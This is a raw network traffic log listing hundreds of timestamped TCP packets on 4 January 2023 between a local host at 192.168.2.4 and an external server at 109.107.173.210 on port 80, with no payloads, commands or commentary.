Jan 4, 2023 16:47:23.788324118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788341045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788388968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788392067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788435936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788466930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788484097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788517952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788536072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788574934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788584948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788619995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788634062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788670063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788682938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788717031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788729906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788765907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788779020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788815022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788825035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788866043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788875103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788914919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.788927078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.788975000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789001942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789021969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789071083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789077997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789119005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789156914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789170980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789217949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789218903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789271116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789289951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789297104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789345026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789371014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789391994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789418936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789453030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789493084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789499998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789549112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789566040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789594889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789617062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789658070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789675951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789686918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789700985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789748907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789758921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789797068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789838076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789845943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789886951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789895058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789944887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.789962053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.789992094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790033102 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790040016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790090084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790126085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790137053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790185928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790193081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790232897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790267944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790278912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790326118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790338039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790374994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790412903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790421963 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790468931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790486097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790519953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790539026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790566921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790611029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790616035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790658951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790663958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790709019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790739059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790755987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790786028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790832043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790874004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790879011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790929079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.790957928 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.790978909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791011095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791024923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791071892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791080952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791120052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791124105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791167974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791168928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791213036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791218042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791260004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791266918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791301966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791316032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791364908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791397095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791397095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791420937 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791441917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791446924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791488886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791491032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791534901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791537046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791580915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791600943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791625977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791646957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791675091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791693926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791722059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791742086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791763067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791789055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791810036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791836023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791883945 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791903019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791925907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791934967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.791968107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.791981936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792020082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792028904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792059898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792078018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792104959 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792125940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792150974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792174101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792197943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792210102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792249918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792258978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792289019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792306900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792330980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792365074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792397976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792397976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792422056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792438984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792453051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792454004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792479038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792494059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792512894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792522907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792546034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792552948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792577982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792592049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792610884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792614937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792644024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792644978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792678118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792678118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.792702913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.792730093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.810600042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810663939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810729980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810784101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810797930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810817957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810839891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.810857058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810895920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.810897112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810926914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.810939074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.810956955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.810983896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.810992956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.811031103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.811039925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.811072111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.811079025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.811109066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.811139107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.811156988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.818619013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.818675041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.818747044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.818793058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.818809032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.818856001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.818859100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.818902016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.818914890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.818950891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.818979025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.818998098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819004059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819045067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819045067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819092035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819093943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819144964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819148064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819195032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819197893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819242954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819248915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819288969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819291115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819339037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819365025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819386005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819391012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819432974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819436073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819482088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819483042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819530010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819546938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819596052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819622993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819654942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819660902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819713116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819715977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819766045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819778919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819827080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819835901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819874048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819875002 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819922924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819947958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.819971085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.819981098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820018053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820029020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820065022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820072889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820111990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820116043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820162058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820164919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820210934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820256948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820271015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820302963 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820316076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820350885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820357084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820398092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820399046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820440054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820451021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820477962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820492029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820518017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820527077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820573092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820574045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820614100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820621014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820662022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820668936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820713043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820717096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820764065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820764065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820806026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820812941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820859909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820861101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820903063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820910931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.820955038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.820959091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821006060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821007013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821050882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821054935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821098089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821103096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821150064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821161985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821197033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821197033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821242094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821245909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821290970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821305037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821352005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821357012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821398020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821404934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821448088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821454048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821497917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821512938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821557045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821569920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821599007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821604967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821645021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821654081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821700096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821744919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821791887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821837902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821886063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821902037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821902037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821902037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821902037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821902037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821928024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821935892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.821979046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.821984053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822031975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822032928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822081089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822082996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822127104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822129011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822174072 CET	49695	80	192.168.2.4	109.107.173.210
